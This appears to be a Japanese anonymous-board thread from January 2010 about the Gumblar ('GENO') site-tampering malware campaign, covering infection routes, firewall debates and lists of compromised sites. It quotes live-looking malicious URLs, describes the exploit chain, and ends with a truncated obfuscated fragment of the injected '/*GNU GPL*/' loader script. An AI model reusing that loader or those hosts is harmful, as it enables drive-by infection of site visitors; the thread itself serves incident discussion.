214名無しさん@お腹いっぱい。:2010/01/03(日) 05:00:05
なんだここは、全くの役立たずスレだな
実際にはFWが役に立っているかどうかなんて分からないくせに
いい加減なこと書き込むんじゃね〜YO・・・ボケw
215名無しさん@お腹いっぱい。:2010/01/03(日) 05:06:43
お前みたいなやつは何言っても駄目だろ
全部書いてあるって言ってるのに
だから自分で試せよ
216名無しさん@お腹いっぱい。:2010/01/03(日) 05:09:10
>>214
質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない
217名無しさん@お腹いっぱい。:2010/01/03(日) 05:56:43
>>204
君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159
こんなに放置されないだろ
218名無しさん@お腹いっぱい。:2010/01/03(日) 06:06:09
>サイト管理者なんていい加減なんだろうな
だよな
はいりのとこまだ埋め込まれてるしw

あと削除してもちゃんと告知してるとこなんてわずかだろ
他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ
219名無しさん@お腹いっぱい。:2010/01/03(日) 06:38:40
そうだな、アホなサイト管理者はたいてい

Avira AntiVir Personal+Comodo Firewall

で完璧!
これ以上のセキュリティはありませんとか信じ込んでるからなwww
220名無しさん@お腹いっぱい。:2010/01/03(日) 06:49:09
アホなサイト管理者を叩くのはいいが何とかしてもらわないと困るのは俺らだぜw
221186:2010/01/03(日) 10:31:55
全容が全く掴めていない感じがする。
IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。
222名無しさん@お腹いっぱい。:2010/01/03(日) 16:38:26
シス管ってなにもできないの?
223名無しさん@お腹いっぱい。:2010/01/03(日) 17:54:11
それなりの規模になると会社の各PCにパーソナルファイヤウォールを入れないことが多い。
シス管のPCも例外ではない。
会社のシステムでトラブルの原因になるから。

そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。

ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな
224名無しさん@お腹いっぱい。:2010/01/03(日) 18:38:48
ローカルに保存されてるHTMLファイルを書き換えるってのは、よくある手法だけど
225名無しさん@お腹いっぱい。:2010/01/03(日) 18:57:52
今回のGumblarの騒ぎをまとめると

最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない

発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2 >>187

この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる

でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる

こんなところだな



226名無しさん@お腹いっぱい。:2010/01/03(日) 19:06:36
以上、古畑任三郎でした
227名無しさん@お腹いっぱい。:2010/01/03(日) 19:40:42
要は自分が管理するFTPサーバを持たない奴は特別気にすることはないと理解していいのか?
228名無しさん@お腹いっぱい。:2010/01/03(日) 19:53:24
今のところは
ただ言われているとおり
いつ攻撃が変わるか分からない
プログラムを実行できてしまうのでどんな攻撃も可能だから注意
229名無しさん@お腹いっぱい。:2010/01/03(日) 21:19:51
個人用のセキュリティソフトはほとんど役に立たないで・・・FA
230名無しさん@お腹いっぱい。:2010/01/03(日) 21:24:20
そんなことはない
231名無しさん@お腹いっぱい。:2010/01/03(日) 21:47:44
んだんだ
脆弱性突かれているのを防ぎきれるもんではないわな
FWもやられてしまうと考えるのが普通
232名無しさん@お腹いっぱい。:2010/01/03(日) 22:04:45
あほ
233名無しさん@お腹いっぱい。:2010/01/03(日) 22:06:22
むしろ無知な人以外にはかなり防御しやすい攻撃
234名無しさん@お腹いっぱい。:2010/01/03(日) 22:21:11
大騒ぎになるマルウェアって単純なやつも多いよな
P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い
ファイルを実行しちゃう時点で駄目だけど
235名無しさん@お腹いっぱい。:2010/01/03(日) 22:22:12
FTPアカウントを攻撃者に送る通信って、何番のポートで行われる?
これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば
ある程度防げそう。
236名無しさん@お腹いっぱい。:2010/01/03(日) 22:23:50
だから制御なんて考えなくてもポップアップされるって
あくまでも今のところな
237名無しさん@お腹いっぱい。:2010/01/03(日) 22:25:36
防げれない。
238名無しさん@お腹いっぱい。:2010/01/03(日) 22:28:25
>>234
単純だからアンチウイルスも検出しにくいって言うのもあるね
239名無しさん@お腹いっぱい。:2010/01/03(日) 22:39:11
脆弱性を突かれしまったらアンチウイルスもFWも全くの無力
ここの連中どんだけ呑気なんだよwww
240名無しさん@お腹いっぱい。:2010/01/03(日) 22:49:15
しつけえな
241名無しさん@お腹いっぱい。:2010/01/03(日) 22:51:50
悔しいから嘘まき散らしてるんだろ
べつに争ってるわけじぇねえんだからやめろよ
242名無しさん@お腹いっぱい。:2010/01/03(日) 22:59:31
脆弱性突かれてもFW入れていれば情報は漏れない・・・ぷぷぷ
嘘の情報流すのはよせよ
243名無しさん@お腹いっぱい。:2010/01/03(日) 23:00:19
FW云々は
事前に感染を防げるかと
感染後の被害を防げるかで
話が噛み合ってない気がする
244名無しさん@お腹いっぱい。:2010/01/03(日) 23:08:15
要は0-dayをどうやって防ぐかってことだろ
Adobe Reader使わなきゃいいんじゃね
245名無しさん@お腹いっぱい。:2010/01/03(日) 23:09:08
>>243
話はかみ合ってないが
漏れてないと思うね
246名無しさん@お腹いっぱい。:2010/01/03(日) 23:11:26
>>244
もちろん脆弱性をふさぐのは基本だけどね

たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話
247名無しさん@お腹いっぱい。:2010/01/03(日) 23:16:01
誰もFWで感染が防げるとか言ってない
一人勘違いしてるみたいだが
同じような人がいるかも知れないから勘違いしないようにね
248名無しさん@お腹いっぱい。:2010/01/03(日) 23:21:38
実際は性能の良いHIPSがあるFWなら防げるけどね
249名無しさん@お腹いっぱい。:2010/01/03(日) 23:25:32
>>242
こいつはなんにも分かってない
脆弱性も分かってない
250名無しさん@お腹いっぱい。:2010/01/03(日) 23:32:21
snortとかに検知ルールがりがり書けばええねん
251名無しさん@お腹いっぱい。:2010/01/03(日) 23:34:10
adobeなんで0DAY長期間放置してるんだ?
252名無しさん@お腹いっぱい。:2010/01/03(日) 23:38:11
adobeに関してははっきりと告知すべきだよな
ほとんどの人は知らないんじゃないか
253名無しさん@お腹いっぱい。:2010/01/03(日) 23:39:39
データ抜いて外部に流すタイプならいいけど
システムやファイル破壊するタイプとか出たら
FWじゃどうしようも無いからなぁ
254名無しさん@お腹いっぱい。:2010/01/03(日) 23:39:48
少なくともカスペは駄目だった
http://oshiete1.goo.ne.jp/qa4982913.html
255名無しさん@お腹いっぱい。:2010/01/03(日) 23:42:36
>>252
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
256名無しさん@お腹いっぱい。:2010/01/03(日) 23:43:07
>>252
FlashPlayer更新してない人も世間的に結構居るんでね?
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう
257名無しさん@お腹いっぱい。:2010/01/03(日) 23:45:11
>>256
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
258名無しさん@お腹いっぱい。:2010/01/03(日) 23:45:23
>>255
そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め
259名無しさん@お腹いっぱい。:2010/01/03(日) 23:46:12
>>255
おまえそんなに悔しいのかよ
260名無しさん@お腹いっぱい。:2010/01/03(日) 23:46:40
>>258
自分で情強とか思ってるだろ
261名無しさん@お腹いっぱい。:2010/01/03(日) 23:47:34
>>259
おまえそんなに悔しいのかよ
262名無しさん@お腹いっぱい。:2010/01/03(日) 23:47:37
>>260
なんだよ情強って?
日本語で書いてくれよ
263名無しさん@お腹いっぱい。:2010/01/03(日) 23:48:24
>>262
おまえそんなに悔しいのかよ
264名無しさん@お腹いっぱい。:2010/01/03(日) 23:48:52
悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ
勘違いしてるんじゃないか
265名無しさん@お腹いっぱい。:2010/01/03(日) 23:51:57
>>254
かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ www
266名無しさん@お腹いっぱい。:2010/01/03(日) 23:53:15
ファイアウォールやアンチウイルスの設定書き換えちゃったりは無いの?
267名無しさん@お腹いっぱい。:2010/01/03(日) 23:56:39
>>266
今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね
268名無しさん@お腹いっぱい。:2010/01/04(月) 00:10:49
http://oshiete1.goo.ne.jp/qa4982913.html
自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、

そのGENOで4月末から5月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの5と9を
両方混在させていたのが失敗でした。

IE6、ファイヤーフォックス3でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
(404にも色々なバージョンがありました。)実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。
269名無しさん@お腹いっぱい。:2010/01/04(月) 00:16:51
>>267
どうもです
取り敢えず安心できそう
270名無しさん@お腹いっぱい。:2010/01/04(月) 00:25:11
ていうかこれもうGENOと呼ぶには違うんじゃね
JREって呼ぼうぜw
271名無しさん@お腹いっぱい。:2010/01/04(月) 00:42:25
>>243
実際>>159で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね
272名無しさん@お腹いっぱい。:2010/01/04(月) 03:19:13
http://imepita.jp/20100104/114370

私のPCが起動するとこんな風になるようになったんですが、
これはこのスレのウイルスに該当しているんですかね?

ちなみにOSはvistaで、
この画像の状態は起動して、
ロゴマークがでて、ユーザーログインしてからの状態です。
273名無しさん@お腹いっぱい。:2010/01/04(月) 03:21:56
矢印のアイコン出て固まる感じ?なら、そうだよ。
274名無しさん@お腹いっぱい。:2010/01/04(月) 03:31:31
カーソルは動くんです
でも背景が真っ暗で、下のスタートのバー?所が真っ白になってます。
真っ白な所に合わせると、矢印から砂時計になります。
この画面から何も操作できないです。

どうすれば復旧できますか?
甘えかも知れませんが、教えていただけるとありがたいです。
275名無しさん@お腹いっぱい。:2010/01/04(月) 06:20:38
>>268
>自分も初期のGENOウイルスでカスペルスキーで感染しました。
>良くHIPSやプロアクティブの事を言われる方を見受けますが
>実際はGENOウイルスには全く役に立ちませんでした、

カスペルスキーの無力ぶりにワロタwww
276名無しさん@お腹いっぱい。:2010/01/04(月) 07:43:59
たかが個人向けの有料あるいは乞食版FWのログを見て無理やり
安心しようとしているところが笑えるスレですね

回避されてるんじゃぁあって思わないのかね
でなきゃこんだけ広がるのはおかしいでしょ
277名無しさん@お腹いっぱい。:2010/01/04(月) 08:10:45
>>276
こういうスレ見てる奴はまあいいんだよ

問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる?て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな
278名無しさん@お腹いっぱい。:2010/01/04(月) 08:13:43
>>276
ほんとしつこいね
その程度の人はお前だけだよ
279名無しさん@お腹いっぱい。:2010/01/04(月) 08:27:36
>>278
ほんとしつこいね
その程度の人はお前だけだよ
280名無しさん@お腹いっぱい。:2010/01/04(月) 08:29:20
たしかに>>278が一番バカっぽいwww
281名無しさん@お腹いっぱい。:2010/01/04(月) 08:30:29
しつこい阿呆のために説明すると
脆弱性を利用してpdfupd.exeがダウンロードされ実行される
トロイ本体が解凍され実行される
ここで通信が行われるからすぐ分かるって話なんだよ
異変に気づけば何らかの対処ができるだろうってこと
282名無しさん@お腹いっぱい。:2010/01/04(月) 08:30:43
一番バカっぽいのは>>278で決まりですね!!!
283名無しさん@お腹いっぱい。:2010/01/04(月) 08:32:02
それでも分からないなら自分で試せ
これでおしまいにしてくれよ
284名無しさん@お腹いっぱい。:2010/01/04(月) 08:33:08
よほど悔しかったみたいだなw
285名無しさん@お腹いっぱい。:2010/01/04(月) 08:35:16
>>281
で、どこのFWなら分かって、どこのFWなら分からないの?
286名無しさん@お腹いっぱい。:2010/01/04(月) 08:44:35
外向きの通信が発生したとき分かるようなソフトならどれでも良いだろ
分からないFWは外向き通信を監視しないやつやそう設定してる場合

具体的にと言うなら俺はOutpostを使ってる
もちろんその他のソフトでも問題ない
287名無しさん@お腹いっぱい。:2010/01/04(月) 08:59:26
アウポなら大丈夫かもしれんけど、そんなもん普通使ってないから
288名無しさん@お腹いっぱい。:2010/01/04(月) 11:30:31
海外からのFTP接続を拒否れば書き変えは不可能ってことでOK?
289名無しさん@お腹いっぱい。:2010/01/04(月) 11:37:57
そんな設定レン鯖で出来るんか?
290名無しさん@お腹いっぱい。:2010/01/04(月) 12:00:36
普通のレン鯖じゃ無理だろうね
291名無しさん@お腹いっぱい。:2010/01/04(月) 12:05:59
>>274
>>4
テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな
292名無しさん@お腹いっぱい。:2010/01/04(月) 17:08:49
年末に感染サイト踏んで、今日までPCオフで様子見。ようやくFTP起動させてサイトのデータDL
数分待って自サイトソース確認するも改ざん現れず

何故生き残ったのか、自分でも分からん
XP(昨年11月以降未うp立て)、IE6(ジャバスクオン)
adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか?
293名無しさん@お腹いっぱい。:2010/01/04(月) 18:23:09
年末にadobeらしきアップデートが出てきてPCがクラッシュしたとか言い出したのが社内にいて
そいつに教えておいたFTPアカウント全部書きかえられてたわ
294名無しさん@お腹いっぱい。:2010/01/04(月) 18:25:36
陥落サイトを掘ってみた。
tp://kyu-ta●sakura●ne●jp/blog/
tp://kyu-ta●sakura●ne●jp/nekkei080401●mht
tp://blog●dtpwiki●jp/dtp/
tp://pcafe●blog3●fc2●com/
tp://blog3●fc2●com/pcafe/
tp://tukimisou●s10●xrea●com/
※〜〜xrea.comは全滅っぽい気がする

tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/
tp://www●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht
妙なとこだけ改竄されてるし
295名無しさん@お腹いっぱい。:2010/01/04(月) 18:34:34
gumblar.cn/が復活してるね

http://www.google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=ja
Google が最後にこのサイトを巡回したのは2010-01-03で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-03です。
296名無しさん@お腹いっぱい。:2010/01/04(月) 19:16:37
>>294
教えてやれよ
297名無しさん@お腹いっぱい。:2010/01/04(月) 20:54:55
>>296
294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。

こういうので個人あてにメールを送っても返信が来た試しがない。
298名無しさん@お腹いっぱい。:2010/01/04(月) 20:55:09
>>294
どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。
299名無しさん@お腹いっぱい。:2010/01/04(月) 21:05:16
>>298
確かに仮想機(うぃんXP2)で踏んでみても何も起こらない・・・
300名無しさん@お腹いっぱい。:2010/01/04(月) 21:24:38
>>294
新手の宣伝か?(笑)
301名無しさん@お腹いっぱい。:2010/01/04(月) 22:11:49
Trojan.Injectに感染した >>294 が居ると聞いて
302名無しさん@お腹いっぱい。:2010/01/04(月) 22:53:39
モロゾフの公式サイトでトロイ配布中
http://tsushima.2ch.net/test/read.cgi/news/1262611814/
303名無しさん@お腹いっぱい。:2010/01/04(月) 23:03:25
GNU GPLの8080ですな。
304名無しさん@お腹いっぱい。:2010/01/04(月) 23:08:20
PDigiiEPG.exeだと!?
305294:2010/01/04(月) 23:22:08
>>298-299
釣ってすまなかったが、
感染してないという検証ありがとう。

【8080チェッカー】
ttp://www12.atpages.jp/trick1/
↑↑↑
ザル&誤検出過多という事が証明されたよw
306名無しさん@お腹いっぱい。:2010/01/04(月) 23:38:33
ザルは仕方ないとしても、語検出もするのかよw
307名無しさん@お腹いっぱい。:2010/01/05(火) 00:31:40
>>292
数分じゃわからんよ
308名無しさん@お腹いっぱい。:2010/01/05(火) 00:32:45
どうやらこのスレは釣り堀化してるな(笑)
309名無しさん@お腹いっぱい。:2010/01/05(火) 00:33:50
アホが釣れた
310名無しさん@お腹いっぱい。:2010/01/05(火) 00:34:58
>>1-999
本スレはこっちですよ。

GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
311名無しさん@お腹いっぱい。:2010/01/05(火) 00:38:46
>>302
に飛んだらNODが反応したんだけど大丈夫かよ
312名無しさん@お腹いっぱい。:2010/01/05(火) 00:39:48
反応したんだから大丈夫だろ
モロゾフで急に騒がしくなったな
313名無しさん@お腹いっぱい。:2010/01/05(火) 00:40:08
コードそのまま貼った奴がいるからな
314名無しさん@お腹いっぱい。:2010/01/05(火) 00:40:09
何故毎度毎度ソースの見方も知らないくせに、あほなチェッカーを信用して
騒ぎ立てるバカが発生するのか
しかもわざわざセキュ板覗いてる程なのに
315名無しさん@お腹いっぱい。:2010/01/05(火) 00:42:32
>>314
色んなやつがいるから仕方ない
316名無しさん@お腹いっぱい。:2010/01/05(火) 00:58:25
317名無しさん@お腹いっぱい。:2010/01/05(火) 00:59:35
今更もう良いよ
ずっとその話してるのに
318名無しさん@お腹いっぱい。:2010/01/05(火) 01:17:10
モロゾフ、アウト〜
319名無しさん@お腹いっぱい。:2010/01/05(火) 01:21:44
こんどはモロゾフか
いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに
モロゾフ報告したけど、いまだに変化なし
320名無しさん@お腹いっぱい。:2010/01/05(火) 02:29:25
>>314
チェッカーの性能がわかったじゃないかw
321名無しさん@お腹いっぱい。:2010/01/05(火) 03:13:55
322名無しさん@お腹いっぱい。:2010/01/05(火) 03:23:06
無理
323名無しさん@お腹いっぱい。:2010/01/05(火) 09:54:58
>>307
一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ
324sage ◆sage/xLnlI :2010/01/05(火) 15:16:29
>>76
踏んじゃった
でもnorton先生が止めてくれた
325名無しさん@お腹いっぱい。:2010/01/05(火) 16:26:02
何かうちのport2049から某RSSサーバにやたらリクエストが送られてるんだが、このウィルス?
326名無しさん@お腹いっぱい。:2010/01/05(火) 17:04:33
ブラウザのRSS機能なんじゃね?
327名無しさん@お腹いっぱい。:2010/01/05(火) 17:17:53
そこまでわかっててGeno疑うってどういう知識の偏り方なのか疑問だ
328名無しさん@お腹いっぱい。:2010/01/05(火) 17:34:35
ヤフートップキタ━━━━(゚∀゚)━━━━!!!!
329名無しさん@お腹いっぱい。:2010/01/05(火) 19:19:24
今日の夕刊読売新聞ガンブラー記事一面
ホンダもやられてたのね
330名無しさん@お腹いっぱい。:2010/01/05(火) 19:43:16
>ホンダもやられてたのね
何をいまさら…。

JR東日本 ttp://www.jreast.co.jp/apology/20091223_restart.html
本田技研 ttp://www.honda.co.jp/oshirase/
モロゾフ ttp://www.morozoff.co.jp/_cms_/news_item/detail/item00085.html
信越放送 ttp://www.sbc21.co.jp/notice/notice091227.html
デジタルマガジン ttp://digimaga.net/2009/12/about-infection-to-the-gumblar-virus.html
アニたまどっとコム(ラジオ関西) 告知消失
331名無しさん@お腹いっぱい。:2010/01/05(火) 23:02:13
エロサイト徘徊している俺は確実にアウトなんだろうな・・・・・・
AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか?
332名無しさん@お腹いっぱい。:2010/01/05(火) 23:24:03
AVGフリーでも反応するぞ
333名無しさん@お腹いっぱい。:2010/01/05(火) 23:35:19
精度は決して高くはないがフリーならまだavastの方がいいぞ
334名無しさん@お腹いっぱい。:2010/01/05(火) 23:46:07
蔓延具合やばいな
次は辻ブログか
どこまで感染が広まるやら
335名無しさん@お腹いっぱい。:2010/01/05(火) 23:58:58
win.jpgって63バイトなんだけど、
これで感染させることができるの?
336名無しさん@お腹いっぱい。:2010/01/06(水) 00:28:27
エスパーさんは先程お眠りになられました
337名無しさん@お腹いっぱい。:2010/01/06(水) 02:21:35
>>335
無理。つかwin.jpgは関係ない。
338名無しさん@お腹いっぱい。:2010/01/06(水) 02:47:02
嘘言うなよ
分からないなら黙ってろ
339名無しさん@お腹いっぱい。:2010/01/06(水) 03:15:52
/*GNU GPL*/のスクリプト解読してみたけどさ
解読して出てきたURL先のものをjavascriptだぞと
というのは記述してるわけ

で今のウィルスってjavascriptで読み込ませたとしても
悪さするプログラムって実行できるわけ?
そもそも勝手なプログラムの実行はvistaだと防げるわけだし

やっぱりアドビの0-dayでアップデートに紛れ込んで
FTPを盗むプログラムを実行したと思われる
だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね

詳しい人どう思う?





340名無しさん@お腹いっぱい。:2010/01/06(水) 03:18:45
>>334
頭のjsがやられてるからハロプロ全体のような希ガス
tp://knnn4321●chips●jp/js/prototype●js

/*GNU GPL*/ try{window.onload
341名無しさん@お腹いっぱい。:2010/01/06(水) 03:22:02
>悪さするプログラムって実行できるわけ?
それが出来ちゃう脆弱性を利用してるわけ
vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない
342名無しさん@お腹いっぱい。:2010/01/06(水) 03:24:46
それに例えスタートアップに登録できなくても
実行できちゃえば
再起動までは攻撃は有効だと思う
343名無しさん@お腹いっぱい。:2010/01/06(水) 03:26:03
>>339
というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ
344名無しさん@お腹いっぱい。:2010/01/06(水) 03:35:39
>>339
何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる
345名無しさん@お腹いっぱい。:2010/01/06(水) 03:46:29
つまり/*GNU GPL*/を読み込むと
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
このどれかをついてプログラムが実行されちゃうってこと?
346名無しさん@お腹いっぱい。:2010/01/06(水) 03:48:34
そういうこと
347名無しさん@お腹いっぱい。:2010/01/06(水) 05:27:59
>>335,337
win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ!
348名無しさん@お腹いっぱい。:2010/01/06(水) 09:31:04
ってかさ、AVG、Avast、MSEssentialsって入れると互いに競合しないの?
一時のAd-AwareとSpyBotみたいに
ウイルスソフトって入れまくってもいいの?
349名無しさん@お腹いっぱい。:2010/01/06(水) 09:37:53
350名無しさん@お腹いっぱい。:2010/01/06(水) 10:09:14
俺AVGツールバーってのインストールしてるんだけど、これの安全性:完全ってサイト使ってれば大丈夫なんだろうか?
今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性:完全ってなるんだろうか?
ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか?
もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・
351名無しさん@お腹いっぱい。:2010/01/06(水) 10:39:55
Java Runtime Environmentて別に使わなかったらアンインストールしたほうほうが無難?
352名無しさん@お腹いっぱい。:2010/01/06(水) 11:44:08
昨日深夜に
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080/pics/win.jpg
からの侵入をノートンが遮断したログが残ってるんですけどこれってなに?
2chを閲覧してたら誘導されたってことかな?
353名無しさん@お腹いっぱい。:2010/01/06(水) 11:48:11
今のところ個人のサイトやブログでは見つかってないんだね。
自分のブログも一応、確認しよう・・・
354名無しさん@お腹いっぱい。:2010/01/06(水) 11:49:57
>>352

>>1よめ
355名無しさん@お腹いっぱい。:2010/01/06(水) 11:59:40
>354
twintailが
HTTP MS MPEG2TuneRequestControl ActiveX BO 2 をと書いてあったので
2chの閲覧が原因かと思ったのですがね。
356名無しさん@お腹いっぱい。:2010/01/06(水) 12:03:00
2日前に踏んだのを、TELNETで入って解析してみたら

sciencedirect-com.lequipe.fr.gamestop-com.superore●ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/

を経由して

ks369871●kimsufi●com:8080

から.jsファイルをダウンロードしようとしていた。だた、このファイルがダウンロードできなかったので助かったようだ。
357名無しさん@お腹いっぱい。:2010/01/06(水) 12:09:43
pdfはレポートとかで使うからなー消したいのに消せないもどかしさ
358名無しさん@お腹いっぱい。:2010/01/06(水) 12:16:57
>>352
そのURLはこのスレの76で直リンされてて
俺の場合、専ブラで画像を自動サムネイルするようにしてるので
専ブラがアクセスしたらAvastのネットワークシールドが遮断した
359名無しさん@お腹いっぱい。:2010/01/06(水) 12:21:16
>>358
76を見ただけでノートンが遮断しました。
原因が解ってほっとしました。 有り難うございます。
360名無しさん@お腹いっぱい。:2010/01/06(水) 12:24:38
>>356
507 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:45:49 ID:zAbuPfRw0
砂箱に入れたFirefoxからFirebugで色々見てみたけど
呼び出される本体のjsファイルがNot foundで発火しないね

508 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:55:20 ID:qZhWCv8d0
アクセス制御で2回目以降は404を装う。

509 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 01:13:20 ID:zAbuPfRw0
串さしてやったら死んだわ・・・
やばいな
361名無しさん@お腹いっぱい。:2010/01/06(水) 12:30:38
>>360
まじかー!
362名無しさん@お腹いっぱい。:2010/01/06(水) 12:55:38
76の攻撃側のアドレスって侵入を試みる度に変わるねえ。
363名無しさん@お腹いっぱい。:2010/01/06(水) 13:09:00
>>361
gumblarの頃からそういうアクセス制御は入ってるよ。
gumblar.xでは2段構成のうちリダイレクト先(ウイルスばら撒き側)は
陥落サイト群の中からPHPが動作しているサイトが選別されていた。
364名無しさん@お腹いっぱい。:2010/01/06(水) 13:47:15
win.jpg
http://www.virustotal.com/jp/analisis/a58e3a42daf56fa95d67a157b9c699e43e89e254bcc717ff04d9d19d1ffb40b4-1262708521
対応済み:Avira・Kaspersky・McAfee・NOD32・Panda・Symantec etc

JavaGame.jar
http://www.virustotal.com/jp/analisis/64b9d4cf390e37a1017b8a585917c0d21c476cdd59193cc3b28fe46861ffd921-1262708821
対応済み:Avira・MSE・Symantec・TrendMicro etc
365名無しさん@お腹いっぱい。:2010/01/06(水) 14:27:45
gumblarに犯されている情報の、最新のサイト名(リンクは要らないです)誰か教えてくれませんか?
366名無しさん@お腹いっぱい。:2010/01/06(水) 14:31:16
対策ソフトを集めてマルウェアの性能テストをしている者です。
PC雑誌の熟読には自信があります。

>通称GENOウイルスに強いかどうか、

ええ、強い方ですけど。

基本的にGENOだろうと何だろうと今はもう何らかの悪意を持つプログラムや
スクリプトを総称してマルウェアと呼んでいます。昔からの名残で説明の便宜上
使うとかその程度の意味しかないです。

私のこれまでの経験から言うとすれば、Kaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
367名無しさん@お腹いっぱい。:2010/01/06(水) 14:43:37
釣り針でかすぎるぞw
368名無しさん@お腹いっぱい。:2010/01/06(水) 14:48:07
Heur.Win32.Generic.v
て言うウイルスが2回も・・・・
369名無しさん@お腹いっぱい。:2010/01/06(水) 15:17:31
大規模流行は大手どこならどこも対応するからどれでも一緒だよ。
370名無しさん@お腹いっぱい。:2010/01/06(水) 16:34:22
>>364
対応早くなったかな?
371名無しさん@お腹いっぱい。:2010/01/06(水) 16:47:36
「拡張子ではなく、内容によってファイルを開く」という設定がIEでは標準有効だからなぁ・・・
372名無しさん@お腹いっぱい。:2010/01/06(水) 16:50:25
変えればいいだけ
373名無しさん@お腹いっぱい。:2010/01/06(水) 16:52:12
なにまた火狐野郎がなんかいっちゃてんのか
374名無しさん@お腹いっぱい。:2010/01/06(水) 16:57:39
あたいはopera使いちゃん!
375名無しさん@お腹いっぱい。:2010/01/06(水) 18:17:46
376名無しさん@お腹いっぱい。:2010/01/06(水) 18:41:26
VirtuaBoxにインストールしたWindows XP SP3でwin.jpgを踏んだら
いつの間にか悪名高いSecurity Toolがインストールされてたw
もう少し遊んでみよう
377名無しさん@お腹いっぱい。:2010/01/06(水) 18:55:34
>>364
avast!はコード自体をwebシールドで弾くから無問題。
378名無しさん@お腹いっぱい。:2010/01/06(水) 19:36:16
Firefox更新きたな
379名無しさん@お腹いっぱい。:2010/01/06(水) 19:39:00
しらん
380名無しさん@お腹いっぱい。:2010/01/06(水) 19:54:30
<script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
